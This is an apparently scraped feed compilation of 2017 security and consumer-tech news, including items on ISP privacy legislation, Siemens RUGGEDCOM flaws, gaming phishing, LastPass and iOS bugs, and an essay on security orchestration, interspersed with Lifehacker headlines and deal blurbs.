The scam that knows your name and home address – here’s what to do

Deadspin LaVar Ball Is A Great Showman And An Unabashed Dickhead | Gizmodo How to Hide Your Browsing

Deadspin LaVar Ball Is A Great Showman And An Unabashed Dickhead | Gizmodo How to Hide Your Browsing History From Your Snooping ISP | Jezebel No More Wedding Gifts | The Root Sean Spicer, Joe Walsh and Bill O’Reilly: Your Hatred for Black Women Is Showing |

from Lifehacker http://ift.tt/2nx07EI

How to Get Through European Customs As Fast As Humanly Possible

Cook My Meat Helps You Cook the Perfect Steak With Science

What Should I Do If ICE Shows Up On My Doorstep?

For Your Kidneys, Running a Marathon Is as Traumatic as Heart Surgery

Tetris May Prevent Flashbacks After You’re in a Gruesome Accident

The Laziest, Cheapest Way to Circumvent Your Snooping ISP

No More Wedding Gifts

Dealers Who Stop Using The Word 'Warranty' Will Still Sell You Bullshit Extras

Starving Yourself Two Days a Week Is Actually Not a Bad Diet

Stick Two Of These Ridiculously Popular Motion Lights In Your Closets For $15

Google Calendar Is Now Optimized for the iPad

Save $50 on the Smart Thermostat That's Smarter Than a Nest

News in brief: Alabama considers porn filters; Samsung launches new Galaxy; celeb’s Instagram hacked

Why Is Everyone Talking About VPNs?

Would You Rather Get $1 Million or $5000 a Month for Retirement?

Today's Best Deals: Anker Switch Accessories, Echo Dots, Merrell Shoes, and More

Got a drone? Check local regulations before you fly it

9 Things to Know About the Samsung Galaxy S8 and Bixby

The Anatomy of the Perfect Cheese Plate

Paleofuture North Korean Defector Describes the Shock of Adjusting to a Society With Advanced Techno

Paleofuture North Korean Defector Describes the Shock of Adjusting to a Society With Advanced Technology | Deadspin Where Will The Raiders Play The Next Three Years? | Jezebel A Creepy Young Man Showed Up on Chloe Grace Moretz’s Doorstep With Cookies, So She Called the Cops | The Root Rep. Maxine Waters Ain’t Got Time for Bill O’Reilly: ‘I Am a Strong Black Woman and I Cannot Be Intimidated’ |

from Lifehacker http://ift.tt/2ogZXkE

Another hole opens up in LastPass that could take weeks to fix

US Congress votes for ISPs to be able to sell customers’ info and browsing history

After the US Senate, the US House of Representatives has voted on whether the privacy rules imposed late last year by the Federal Communications Commission (FCC) on Internet service providers should go into effect.

As in the Senate before this, the majority of the representatives – 215 of the 420 present – voted for the rules to be scrapped.

Such a resolution, if signed by the US President Donald Trump, will mean that ISPs and mobile data carriers will be able to sell or share its customers’ Web browsing and app usage history and other private information to advertisers and other third parties, without having to ask those customers for permission.

It would also mean that the Federal Communications Commission will, in the future, likely not be able to issue new rules for protecting the privacy of consumers.

Organizations that fight for US citizens’ civil and digital liberties are opposed to this resolution, and have been fighting against it.

ACLU Legislative Counsel Neema Singh Guliani has urged President Trump to veto this resolution “and show he is not just a president for CEOs but for all Americans.”

The Electronic Frontier Foundation has recently published a post warning about a number of negative consequences that could arise if this legislation is allowed to pass.

Those include ISPs collecting user information and not protecting it well enough from hackers, pushing for means to thwart encryption, inserting ads into customers’ browsing, using pre-installed spyware and unremovable tracking tags and cookies.

“Should President Donald Trump sign S.J. Res. 34 into law, big Internet providers will be given new powers to harvest your personal information in extraordinarily creepy ways. They will watch your every action online and create highly personalized and sensitive profiles for the highest bidder. All without your consent,” EFF’s Legislative Counsel Ernesto Falcon pointed out.

“This breaks with the decades long legal tradition that your communications provider is never allowed to monetize your personal information without asking for your permission first. This will harm our cybersecurity as these companies become giant repositories of personal data. It won’t be long before the government begins demanding access to the treasure trove of private information Internet providers will collect and store.

How to protect your information from ISPs?

Using your browser’s private or incognito mode will do nothing, as it only prevents the browser from seeing and “remembering” which websites you visited.

Websites that implement encrypted communications (e.g. use HTTPS) will prevent ISPs and mobile data carriers from seeing what users do on these sites, but won’t prevent them knowing that they visited them. Add-ons like HTTPS Everywhere can only minimize the extent of specific ISP tracking, not remove it altogether. Still, switching to encrypted communications and HTTPS-protected websites is a good idea.

Using a VPN or Tor might help some, but there are some sites that block access attempts from such sources. Also, in the case of VPNs, you need to be able to trust those companies that they won’t be collecting your browsing data and selling it themselves.

You might want to try and switch to one of the small ISPs that oppose the resolution, but the option will not be available for all users.

And, unfortunately, there is no easy way for individual, tech-unsavvy users to check the devices they received or bought directly from providers for spyware.

from Help Net Security http://ift.tt/2oysv8u

Lean Into the Alexa-Powered Future With $20 Off Three Amazon Echo Dots

These New Food Labels Help You Figure Out What You're Actually Buying

Siemens RUGGEDCOM industrial communication devices vulnerable to remote attacks

All version of Siemens RUGGEDCOM ROX I VPN endpoints and firewall devices sport five vulnerabilities that can be exploited by attackers to perform actions with administrative privileges.

The announcement was made via advisories both by Siemens and the US ICS-CERT, and the discovery of four of the five vulnerabilities credited to security researcher Maxim Rupp, of German cybersecurity services firm Cure53.

RUGGEDCOM ROX-based devices are used to connect devices that operate in harsh environments such as electric utility substations and traffic control cabinets, and are deployed by organizations in the energy, healthcare, and transportation industries across the world.

The vulnerabilities

The vulnerabilities affect the devices’ web interface and integrated web server (both at port 10000/TCP), some are remotely exploitable, and they don’t require attackers to possess a high skill level.

By taking advantage of the flaws, attackers could access sensitive information, perform actions with the privileges of an authenticated user, change configuration settings, and perform Cross-Site Scripting (XSS) attacks.

Two of the vulnerabilities can be triggered by tricking users into clicking on a malicious link, although there are some other conditions that have to be met in order for the exploit to work, namely that a privileged session is open in the same browser.

A set of solutions for the issues

No patches for the issues have been offered, and there is no indication they will be.

Still, Siemens has offered a number of mitigations that should remove all risk, and they include:

• Using a provided mitigation tool to disable the web interface and guest and operator accounts
• Restricting access to the devices to trusted administrators only
• Applying cell protection (as defined in Siemens’s operational guidelines for Industrial Security)
• Using VPN for protecting network communication between cells
• Applying Defense-in-Depth principles, and
• Protecting network access to the web interface with appropriate mechanisms.

from Help Net Security http://ift.tt/2ogsirf

Amazon Wants You To Get Outdoors With This Merrell Shoe Sale

Do You Still Need to Cut Up Your Canceled Credit Cards?

Security Orchestration and Incident Response

Last month at the RSA Conference, I saw a lot of companies selling security incident response automation. Their promise was to replace people with computers ­-- sometimes with the addition of machine learning or other artificial intelligence techniques ­-- and to respond to attacks at computer speeds.

While this is a laudable goal, there's a fundamental problem with doing this in the short term. You can only automate what you're certain about, and there is still an enormous amount of uncertainty in cybersecurity. Automation has its place in incident response, but the focus needs to be on making the people effective, not on replacing them ­ security orchestration, not automation.

This isn't just a choice of words ­-- it's a difference in philosophy. The US military went through this in the 1990s. What was called the Revolution in Military Affairs (RMA) was supposed to change how warfare was fought. Satellites, drones and battlefield sensors were supposed to give commanders unprecedented information about what was going on, while networked soldiers and weaponry would enable troops to coordinate to a degree never before possible. In short, the traditional fog of war would be replaced by perfect information, providing certainty instead of uncertainty. They, too, believed certainty would fuel automation and, in many circumstances, allow technology to replace people.

Of course, it didn't work out that way. The US learned in Afghanistan and Iraq that there are a lot of holes in both its collection and coordination systems. Drones have their place, but they can't replace ground troops. The advances from the RMA brought with them some enormous advantages, especially against militaries that didn't have access to the same technologies, but never resulted in certainty. Uncertainty still rules the battlefield, and soldiers on the ground are still the only effective way to control a region of territory.

But along the way, we learned a lot about how the feeling of certainty affects military thinking. Last month, I attended a lecture on the topic by H.R. McMaster. This was before he became President Trump's national security advisor-designate. Then, he was the director of the Army Capabilities Integration Center. His lecture touched on many topics, but at one point he talked about the failure of the RMA. He confirmed that military strategists mistakenly believed that data would give them certainty. But he took this change in thinking further, outlining the ways this belief in certainty had repercussions in how military strategists thought about modern conflict.

McMaster's observations are directly relevant to Internet security incident response. We too have been led to believe that data will give us certainty, and we are making the same mistakes that the military did in the 1990s. In a world of uncertainty, there's a premium on understanding, because commanders need to figure out what's going on. In a world of certainty, knowing what's going on becomes a simple matter of data collection.

I see this same fallacy in Internet security. Many companies exhibiting at the RSA Conference promised to collect and display more data and that the data will reveal everything. This simply isn't true. Data does not equal information, and information does not equal understanding. We need data, but we also must prioritize understanding the data we have over collecting ever more data. Much like the problems with bulk surveillance, the "collect it all" approach provides minimal value over collecting the specific data that's useful.

In a world of uncertainty, the focus is on execution. In a world of certainty, the focus is on planning. I see this manifesting in Internet security as well. My own Resilient Systems ­-- now part of IBM Security --­ allows incident response teams to manage security incidents and intrusions. While the tool is useful for planning and testing, its real focus is always on execution.

Uncertainty demands initiative, while certainty demands synchronization. Here, again, we are heading too far down the wrong path. The purpose of all incident response tools should be to make the human responders more effective. They need both the ability and the capability to exercise it effectively.

When things are uncertain, you want your systems to be decentralized. When things are certain, centralization is more important. Good incident response teams know that decentralization goes hand in hand with initiative. And finally, a world of uncertainty prioritizes command, while a world of certainty prioritizes control. Again, effective incident response teams know this, and effective managers aren't scared to release and delegate control.

Like the US military, we in the incident response field have shifted too much into the world of certainty. We have prioritized data collection, preplanning, synchronization, centralization and control. You can see it in the way people talk about the future of Internet security, and you can see it in the products and services offered on the show floor of the RSA Conference.

Automation, too, is fixed. Incident response needs to be dynamic and agile, because you are never certain and there is an adaptive, malicious adversary on the other end. You need a response system that has human controls and can modify itself on the fly. Automation just doesn't allow a system to do that to the extent that's needed in today's environment. Just as the military shifted from trying to replace the soldier to making the best soldier possible, we need to do the same.

For some time, I have been talking about incident response in terms of OODA loops. This is a way of thinking about real-time adversarial relationships, originally developed for airplane dogfights, but much more broadly applicable. OODA stands for observe-orient-decide-act, and it's what people responding to a cybersecurity incident do constantly, over and over again. We need tools that augment each of those four steps. These tools need to operate in a world of uncertainty, where there is never enough data to know everything that is going on. We need to prioritize understanding, execution, initiative, decentralization and command.

At the same time, we're going to have to make all of this scale. If anything, the most seductive promise of a world of certainty and automation is that it allows defense to scale. The problem is that we're not there yet. We can automate and scale parts of IT security, such as antivirus, automatic patching and firewall management, but we can't yet scale incident response. We still need people. And we need to understand what can be automated and what can't be.

The word I prefer is orchestration. Security orchestration represents the union of people, process and technology. It's computer automation where it works, and human coordination where that's necessary. It's networked systems giving people understanding and capabilities for execution. It's making those on the front lines of incident response the most effective they can be, instead of trying to replace them. It's the best approach we have for cyberdefense.

Automation has its place. If you think about the product categories where it has worked, they're all areas where we have pretty strong certainty. Automation works in antivirus, firewalls, patch management and authentication systems. None of them is perfect, but all those systems are right almost all the time, and we've developed ancillary systems to deal with it when they're wrong.

Automation fails in incident response because there's too much uncertainty. Actions can be automated once the people understand what's going on, but people are still required. For example, IBM's Watson for Cyber Security provides insights for incident response teams based on its ability to ingest and find patterns in an enormous amount of freeform data. It does not attempt a level of understanding necessary to take people out of the equation.

From within an orchestration model, automation can be incredibly powerful. But it's the human-centric orchestration model --­ the dashboards, the reports, the collaboration --­ that makes automation work. Otherwise, you're blindly trusting the machine. And when an uncertain process is automated, the results can be dangerous.

Technology continues to advance, and this is all a changing target. Eventually, computers will become intelligent enough to replace people at real-time incident response. My guess, though, is that computers are not going to get there by collecting enough data to be certain. More likely, they'll develop the ability to exhibit understanding and operate in a world of uncertainty. That's a much harder goal.

Yes, today, this is all science fiction. But it's not stupid science fiction, and it might become reality during the lifetimes of our children. Until then, we need people in the loop. Orchestration is a way to achieve that.

This essay previously appeared on the Security Intelligence blog.

from Schneier on Security http://ift.tt/2ogctko

Lawmakers scathing over FBI’s facial recognition database

Phishers offer WoW players free in-game pets

Avid World of Warcraft players are being targeted with phishing emails seemingly coming from Blizzard Entertainment, the video game developer behind the popular multiplayer role-playing game, warns Malwarebytes’ Chris Boyd.

The email is supposedly a notification that a friend has purchased an in-game pet for the email recipient, and the latter can claim said pet by logging into Battle.net, Blizzards online gaming platform.

Unfortunately, clicking the button in the email will direct the recipient to a web page that looks a bit like Battle.net’s login page, but is not – it’s a phishing website created to collect victims’ login credentials.

The (long) URL of the blocked phishing site mentions Battle.net, “password verify”, “login”, and “account support”, in the attempt to convince potential victims of the site’s legitimacy.

The Google Safe Browsing service is already warning visitors that the website is deceptive, and can trick them into doing something dangerous, like installing software or disclosing sensitive information.

Still, it’s a piece of cake for the scammers to set up a new one and simply change the link in the phishing email, so the threat is still there, and gamers should be wary.

from Help Net Security http://ift.tt/2ofNlKO

Why we should define our right to privacy now, before it’s too late

The debate has stirred up again. Talk of wiretapping and government spying has spurred another bout of privacy versus security. Internet of Things (IoT) devices have raised suspicion that strangers are listening to us or watching us using everything from TVs to toys.

But all this talk of snooping, eavesdropping, and hacking is a red herring. It’s a distraction. The central question in all of this, one that few are actually talking about, is whether privacy is a human right and what should be done to protect and cherish it.

Security professionals and businesses entrusted with our data have borne the cost and operational responsibility of protecting privacy for too long. What we need is a constitutional amendment that very clearly defines a right to privacy. Without one, we’ll forever be looking over our digital shoulders.

Privacy should be defended as a human right

Seemingly every week, another data breach leaks more of our personal information. Ransom attacks continue to grow, holding our private data hostage until we pay up. Our credit card numbers, our passwords, and our medical records are all the targets of hackers.

But the attacks don’t always come from enemies. Our government can potentially peer into our lives, whether through incidental surveillance or zero-day vulnerabilities that give them access to our devices or apps.

Even our favorite companies can do harm. Businesses, by not taking better steps to secure their IT environments, put in jeopardy the troves of data we hand to them. On a more concerning note, some connected children’s toys can collect audio in our homes without authorization, and the expansion of smart home devices allows companies to collect increasingly personal data about our habits and preferences.

The cost and the responsibility of defending our privacy have always fallen on the organizations we trust our data to and whose devices we buy. Some businesses are better about protecting those assets than others.

But defending data privacy, as important as that is, has always been just the tip of the iceberg.

Our right to privacy extends much further than just our data. It’s our right to our own thoughts and private moments. It’s being able to have a conversation, send a text, or simply relax in our own homes without wondering whether someone else is watching or listening in.

But right now there are no laws that adequately defend our privacy and give us ownership of those moments. Nothing specifically guides whether the government, businesses, or others can confiscate, sell, or use them.

Yet these moments are fundamental to our humanity. Our privacy should be defended like life, liberty, and the pursuit of happiness as unalienable rights. It should be codified by Constitutional amendment like our freedom of speech, religion, and assembly.

Privacy and the Constitution

The right to privacy has been defended by the Supreme Court, which has cited various amendments to the Constitution, including the first, third, fourth, fifth, and fourteenth, in a number of different cases. But we need something more explicit in its protections, something that can encompass the trails of data we leave in the wake of every action, something that can return control of ourselves to ourselves.

A potential amendment to guard our privacy should include the following provisions:

• U.S. citizens have a right to privacy. Period.
• Citizens have ownership over their data, from personally identifying information to internet avatars and profiles.
• Citizens choose who can access that data, when, and for how long.
• Citizens can opt out of government programs, choosing privacy over security.

By codifying these protections in a new amendment, we can clarify court cases, ascribe responsibility for better security that ensures our privacy, and shore up an essential part of what makes us human as technology offers more ways to tap into our thoughts, feelings, and private moments.

Adding these rights to the Constitution would elevate the right to privacy to the echelon of speech, press, and other rights that are fundamental not only to our personal identity, but to our American identity.

Technology saves us time, connects us across vast distances, delivers entertainment, keeps us safe, advances scientific discovery, and every day makes the world better. But as it does, we need to make sure we guard what makes us human – including our privacy, which is under assault by hackers, can be compromised by security-focused governments, and sometimes lacks optimal security from corporations.

It’s time to define and defend our right to privacy once and for all.

from Help Net Security http://ift.tt/2ofAckH

Modern security programs: Artificial intelligence and machine learning

A new research report by Carbon Black aggregates insight from more than 400 interviews with leading cybersecurity researchers who discussed non-malware attacks, artificial intelligence (AI) and machine learning (ML), among other topics.

“Based on how cybersecurity researchers perceive current AI-driven security solutions, cybersecurity is still very much a ‘human vs. human’ battle, even with the increased levels of automation seen on both the offensive and defensive sides of the battlefield,” said Carbon Black CTO, Michael Viscuso. “And, the fault with machine learning exists in how much emphasis organizations may be placing on it and how they are using it. Static, analysis-based approaches relying exclusively on files have historically been popular, but they have not proven sufficient for reliably detecting new attacks. Rather, the most resilient ML approaches involve dynamic analysis – evaluating programs based on the actions they take.”

Modern security programs: Key trends

The results were definitive, pointing to the following trends:

• The vast majority (93%) of cybersecurity researchers said non-malware attacks pose more of a business risk than commodity malware attacks.
• Nearly two thirds (64%) of cybersecurity researchers said they’ve seen an increase in non-malware attacks since the beginning of 2016. There non-malware attacks are increasingly leveraging native system tools, such as WMI and PowerShell, to conduct nefarious actions, researchers reported.
• AI is considered by most cybersecurity researchers to be in its nascent stages and not yet able to replace human decision making in cybersecurity. 87% of the researchers said it will be longer than three years before they trust AI to lead cybersecurity decisions.
• Three quarters (74%) of researchers said AI-driven cybersecurity solutions are still flawed.
• 70% of cybersecurity researchers said ML-driven security solutions can be bypassed by attackers. Nearly one-third (30%) said attackers could “easily” bypass ML-driven security.
• Cybersecurity talent, resourcing and trust in executives continue to be top challenges plaguing many businesses.

Said one cybersecurity researcher: “Non-malware attacks will become so widespread and target even the smallest business that users will become familiar with them. Most users seem to be familiar with the idea that their computer or network may have accidentally become infected with a virus, but rarely consider a person who is actually attacking them in a more proactive and targeted manner.”

from Help Net Security http://ift.tt/2o9a5iF

Don’t forget to pack security for the journey to the cloud

When you move workloads to public cloud platforms, you offload many tasks on the cloud provider, but don’t fall for the misconception that you’re entirely off the hook with security.

Although cloud providers “rent” their computing infrastructure to you, they operate on a “shared security responsibility” model, meaning you still must protect your workloads in the cloud.

So, just as with your on-premises systems, you must perform vulnerability management, policy compliance, malware detection and web app scanning in your cloud instances.

By the same token, the responsibility for extending security to cloud workloads falls on the same constituencies involved with defending your on-premises infrastructure, namely:

The CISO, who needs to see the organization’s on-premises and cloud security posture from a single, central dashboard. If the organization is using multiple cloud platforms, such as Amazon Web Services (AWS), Google Cloud Platform (GCP) and Microsoft Azure, the CISO will want to have visibility across all of them, with details on how each instance is being secured and what workloads are running on them. The CISO will use this information for a variety of purposes, including:

• To make sure the organization’s security and compliance standards are being met in the cloud
• To look for opportunities to cut costs and reduce complexity by identifying redundant, obsolete and functionally-narrow security tools and replacing them with integrated cloud-based suites

Vulnerability management / security pros, who are eager to be in the loop as these cloud migrations and deployments are planned and carried out. These staffers want to make sure their security tools can be connected to these cloud infrastructures. They need to know what vulnerabilities exist in the new cloud environment, and which ones are critical, such as zero-day types. Likewise, they need to monitor regulatory and policy compliance. The security team also wants to learn how to establish remediation priorities in cloud environments, which are more elastic, with virtual instances getting spun up and down constantly.

The DevSecOps group, which will want to be part of the entire lifecycle of application development projects carried out in cloud platforms, just as they are involved with the on-premises pipeline. That way, they will be able to “shift left” in the cloud as well, spotting and fixing security issues and vulnerabilities early and often in the app dev process, before code gets to the deployment and production stage.

Auditors, who will want security and compliance reports to have the same format as the ones they’re accustomed to seeing for on-premises systems. This will speed up the auditing process and make auditors happy.

Qualys: One security and compliance platform for all your on-premises and elastic cloud needs

As your IT environment becomes hybrid you’ll need a set of security and compliance tools that can protect your systems both on premises and in the cloud.

This will lower your costs, simplify the management of your security and compliance posture, and both boost and improve your defenses.

Here’s where Qualys can help you. The Qualys Cloud Platform provides consistent, uniform, scalable, versatile and effective visibility of security and compliance posture for hybrid on-premises and elastic-cloud IT environments.

Our suite of 10 integrated security and compliance solutions use a variety of data collection methods and technologies, and connect to a robust analysis, correlation and reporting back-end engine.

For your cloud workloads, Qualys covers key areas, including:

• Continuous asset discovery and tracking, dynamic tagging, dashboarding and reporting, to give you “single pane of glass” visibility into all your IT assets, wherever they reside.
• Internal asset scanning and app protection, which provides vulnerability analysis and compliance checks across operating systems, databases and servers, as well as identification of application and REST API vulnerabilities, combined with firewall rules and one-click virtual patching.
• Perimeter scanning, which gives you a continuous hacker’s-eye view into all your public IPs.

For security and compliance data collection, we offer options including virtual scanner appliances, lightweight and configurable cloud agents and Internet scanners.

Cloud coverage: AWS, Azure and Google Cloud, with more to come

Qualys has agreements and integrations with the three main public cloud platform providers: Amazon, Microsoft and Google.

For AWS, our Qualys Virtual Scanner Appliance (QVSA) is pre-authorized by Amazon, and we support both EC2-Classic and EC2-VPC (Virtual Private Cloud). In addition, our groundbreaking Cloud Agents are also certified to work in EC2, giving you the option of using them for security and compliance monitoring as well.

Meanwhile, the QVSA is available in the Azure marketplace, where we support both the Classic and ARM modes. The Qualys Cloud Agents are integrated within the Azure Security Center.

In Google Cloud, you’ll find the QVSA in the Launcher, and the Cloud Agents are certified to work with this platform.

In all cases — AWS, GCP and Azure — you license the Qualys tools from us and use them on your cloud instances, the BYOL (bring your own licensing) model.

Qualys is working to add support for a few more cloud platforms.

Proven success

Qualys is already being used to protect critical cloud workloads in the real world. For example, a large global bank replicated the success of its mature vulnerability management program for on-premises data centers on AWS instances, which it is aggressively adopting.

With more than 20,000 AWS instances getting frequently refreshed, the bank needed visibility across its rapidly-growing cloud deployments. The CISO was also looking to consolidate tools and processes.

The bank utilized AssetView, Qualys’ automated IT asset inventory service, to obtain visibility and detailed asset information from its EC2 instances using Qualys scanners and agents. To monitor edge servers, it is using Qualys perimeter Internet scanners.

In addition, an online video streaming company with a global presence is using Qualys to automate security and compliance within a DevOps process in AWS.

With frequent load bursts and a high churn of elastic cloud instances, the company realized it needed agile security practices and quick and clear visibility into its cloud environment, as well as automated and API centric build processes.

The company incorporated Qualys scanning into the build process to check for vulnerabilities and compliance violations early and often, and implemented end-to-end automation using REST APIs.

With our existing security and compliance capabilities for cloud instances, we are supporting and securing your infrastructure in the cloud, so you’ll have a single pane of glass view of your hybrid on-premises and cloud IT environment.

from Help Net Security http://ift.tt/2owsMsX

Anker's PowerLine II Might Be the Last Lightning Cable You Ever Buy

Macs and iPhones patched – including 23 kernel-level holes

The Most Useful Language for English Speakers to Learn, According to an Economist

How Twitter's New Filters Can Keep Out the Trolls and Rotten Eggs

Congress Just Gave Internet Providers the Green Light to Sell Your Browsing History Without Consent

'In-Store Availability' Is Never Accurate

Microsoft Excel Finally Gets Real-Time Co-Authoring

Now You Can Get Super-Affordable LED Flood Lights, Too

Get Four Packing Cubes, a Dirty Laundry Bag, and a Shoe Bag For Just $12

News in brief: Hong Kong voters’ data lost; Rudd faces pushback; Google Home lands in Britain

How to Use 1Blocker to Hide Everything That Annoys You On Mobile Sites

Your State Might Be About to Pass Some Bad Laws

How I Let Disney Track My Every Move

Today's Best Deals: Up To $50 Off a Kindle, ECCO Shoes, Anker Desk Lamp, and More

Man loses appeal over Facebook threat to kill Obama

eBay to ‘downgrade’ verification by switching to SMS

You Might Be Able to Get Price Protection on Amazon If You Buy From a Third Party

Deadspin Why The Vote To Move The Raiders To Las Vegas Wasn’t Unanimous | Gizmodo How I Let Disney T

Deadspin Why The Vote To Move The Raiders To Las Vegas Wasn’t Unanimous | Gizmodo How I Let Disney Track My Every Move | Jezebel The Cast of The Fresh Prince of Bel-Air Reunited For a Very Good Photo | The Root What Chris Brown’s Guest Appearance on Black-ish Says About All of Us |

from Lifehacker http://ift.tt/2o1ZMfR

This ECCO Gold Box Was Made For The Indecisive Shoe-Wearer

With iOS 10.3, iDevices get new Apple File System with native encryption support

On Monday, Apple released updates for its various products. As usual, they fix flaws and add capabilities, but the iOS update (v10.3) is more noteworthy than usual, as it will make all updated iDevices switch to a new file system.

It’s called Apple File System (APFS).

APFS is engineered with encryption as a primary feature (it has native encryption support), and is optimized for Flash/SSD storage (the HFS+ file system these devices used until now was developed when file sizes were calculated in kilobytes or megabytes).

Add to this copy-on-write metadata, space sharing, cloning for files and directories, snapshots, fast directory sizing, atomic safe-save primitives, and improved file system fundamentals, and you have a file system that should meet the challenges of this era.

APFS and encryption

APFS supports multiple levels of file system encryption – no encryption, one key per volume (metadata and data are encrypted with the same key), and multi-key encryption.

As Apple developers explained at last year’s Worldwide Developers Conference, in the latter option, sensitive metadata is encrypted with a single key that’s distinct from the per file keys that are used in encrypting individual files. APFS also supports per extent encryption, so each region of a file can be encrypted with its own key.

“Apple File System uses AES-XTS or AES-CBC encryption modes, depending on hardware,” the company shared in this guide to the new file system.

“Multi-key encryption ensures the integrity of user data. Even if someone were to compromise the physical security of the device and gain access to the device key, they still couldn’t decrypt the user’s files.”

The company aims to implement APFS eventually in all of its products, but have started with iOS-running devices. It is scheduled to be shipped to macOS consumers later this year.

A list of other improvements and new features included in the newest iOS version can be found here, and a list of security fixes here. iOS 10.3 also fixes a bug in the way that Mobile Safari handles pop-up dialogs, recently exploited by scammers.

from Help Net Security http://ift.tt/2oulCFt

Never Reveal Your Previous Salary When Negotiating for a Job

How to Prepare Vegetables That You'd Actually Want to Eat

‘Siri, please dial 999 and save Mummy’s life’

Website Performance Bootcamp: Quiz-based training course

The Website Performance Bootcamp is an online portal that provides quiz-based technical training in the field of website acceleration and content optimization.

Whether you’re running an e-commerce site, online gaming platform or enterprise website, your users expect a great experience every time they visit your site. Content Delivery Networks (CDNs) are an effective way to achieve this goal, minimizing site load times and reducing operational costs.

What’s inside?

This comprehensive quiz-based training course is comprised of 16 sections, divided into Basic and Advanced levels, on topics ranging from content caching to HTTP protocol and file compression techniques.

These challenging quizzes are designed to do much more than just test your knowledge and give you a score. Each question comes with a complete explanation of the right answer so you can learn from your mistakes.

from Help Net Security http://ift.tt/2nw9sxZ

How to Talk to Your Parents About Money Without Being a Jerk

India extends ‘Orwellian’ ID card scheme as critics warn of risks

Tackle Your Home Improvement Projects With Amazon's One-Day Drill Discount

Kalyna Block Cipher

Kalyna is a block cipher that became a Ukrainian national standard in 2015. It supports block and key sizes of 128, 256, and 512 bits. Its structure looks like AES but optimized for 64-bit CPUs, and it has a complicated key schedule. Rounds range from 10-18, depending on block and key sizes.

There is some mention of cryptanalysis on reduced-round versions in the Wikipedia entry. And here are the other submissions to the standard.

from Schneier on Security http://ift.tt/2ncEfNf

Why government plans to spy on WhatsApp will fail

LastPass is working on fixing latest code execution bug

It’s been an eventful couple of weeks for LastPass developers, as they’ve scrambled to fix a couple of serious flaws in the popular password manager’s extensions, which would allow attackers to get at users’ passwords and even execute code on the users’ machines.

The flaws were flagged by Google Project Zero researcher Tavis Ormandy, and responsibly disclosed to the company. To their credit, LastPass has been doing a great job at responding to the vulnerability reports – even Ormandy says so.

But some fixed versions of the extensions were not immediately published, because the company waited for Microsoft and Opera to approve them beforehand.

Then, on Saturday, Ormandy came up with a new way to perform code execution in LastPass for Chrome 4.1.43 (the current latest version of the extension). He sent the working exploit and bug report immediately to LastPass, and the company acknowledged it.

“Over the weekend, Google security researcher Tavis Ormandy reported a new client-side vulnerability in the LastPass browser extension. We are now actively addressing the vulnerability,” they noted.

“This attack is unique and highly sophisticated. We don’t want to disclose anything specific about the vulnerability or our fix that could reveal anything to less sophisticated but nefarious parties. So you can expect a more detailed post mortem once this work is complete.”

The company has 90 days to fix the flaw before Google goes public with information about it, as per their vulnerability disclosure policy.

Ormandy’s tweet about the new exploit has fuelled a discussion on Twitter about responsible vulnerability disclosure, with some taking umbrage at the fact that he revealed the bug’s existence, while many others taking the security researcher’s corner, noting that he didn’t reveal details that would help attackers exploit the vulnerability.

Ormandy just confirmed that the exploit works on all browser extensions and platforms, even if users temporarily log out of the extension, and pointed out that “it will take a long time to fix this properly, it’s a major architectural problem.”

LastPass has noted that they greatly value the work that Tavis, Project Zero, and other white-hat researchers provide.

“We all benefit when this security model works for responsibly disclosing bugs, and are confident LastPass is stronger for the attention,” they commented, and invited contributions from all researchers via their bug bounty program.

from Help Net Security http://ift.tt/2otK1Lo

Scareware scammers target iOS users

A bug in the way that Mobile Safari handles pop-up dialogs has been abused to scare iOS users into paying a “fine” in the form of an iTunes pre-paid card.

The iOS scareware scam

“This attack was initially reported to Lookout’s Support desk by one of our users running iOS 10.2. The user reported that he had lost control of Safari after visiting a website and was no longer able to use the browser,” Lookout researchers explained.

“The user provided a screenshot showing a ransomware message from pay-police[.]com, with an overlaid ‘Cannot Open Page’ dialog from Safari. Each time he tapped ‘OK’ he would be prompted to tap ‘OK’ again, effectively putting the browser into an infinite loop of dialog prompts that prevented him from using the browser.”

The scammers have purchased a large number of different domains, and equipped them with obfuscated JavaScript code that would trigger the bug in Mobile Safari.

The website was also capable of “recognizing” the users’ country code identifier, and serve different messages based on it. The intended targets were mostly from English-speaking countries: the US, the UK, Ireland, Australia and New Zealand.

But what some of the victims probably didn’t know is that they could have easily restored the browser’s functionality by simply emptying its cache (Settings > Safari > Clear History and Website Data).

The attack was contained within Safari’s sandbox, so the victims’ devices were not actually compromised.The attackers banked on users’ fear and shame to pull the scam off.

Upgrade to iOS 10.3

Lookout notified Apple of the attack, and the iThings manufacturer fixed the abused flaw in iOS 10.3, which was released on Monday.

“The pop-up window error dialog on newer versions of iOS is actually the result of Mobile Safari not being able to find a local URL lookup, so it fails, but keeps presenting the dialog message due to the infinite loop in the code,” the researchers explained.

“The attack, based on its code, seems to have been developed for older versions of iOS, such as iOS 8. However, the abuse of pop-ups in Mobile Safari was still possible until iOS 10.3.”

With the new iOS version, these pop-ups won’t be locking the entire browser, but just that one tab, which can be simply closed and the user can continue using the browser like nothing happened.

Users are advised to update their iOS-running iThings to version 10.3 to close up this particular attack vector.

from Help Net Security http://ift.tt/2nq581A

1.37 billion data records compromised globally in 2016

Gemalto’s Breach Level Index revealed that 1,792 data breaches led to 1.37 billion data records being compromised worldwide during 2016, an increase of 86% compared to 2015. Identity theft was the leading type of data breach in 2016, accounting for 59% of all data breaches. In addition, 52% of the data breaches in 2016 did not disclose the number of compromised records at the time they were reported.

The Breach Level Index (BLI) is a global database that tracks data breaches and measures their severity based on multiple dimensions, including the number of records compromised, the type of data, the source of the breach, how the data was used, and whether or not the data was encrypted. By assigning a severity score to each breach, the Breach Level Index provides a comparative list of breaches, distinguishing data breaches that are a not serious versus those that are truly impactful (scores run 1-10).

According to the BLI, more than 7 billion data records have been exposed since 2013 when the index began benchmarking publicly disclosed data breaches. Breaking it down that is over 3 million records compromised every day or roughly 44 records every second.

Last year, the account access based attack on AdultFriend Finder exposing 400 million records scored a 10 in terms of severity on the BLI. Other notable breaches in 2016 included Fling (BLI: 9.8), Philippines’ Commission on Elections (COMELEC) (BLI: 9.8), 17 Media (BLI: 9.7) and Dailymotion (BLI: 9.6). In fact the top 10 breaches in terms of severity accounted for over half of all compromised records. In 2016, Yahoo! reported two major data breaches involving 1.5 billion user accounts, but are not accounted for in the BLI’s 2016 numbers since they occurred in 2013 and 2014.

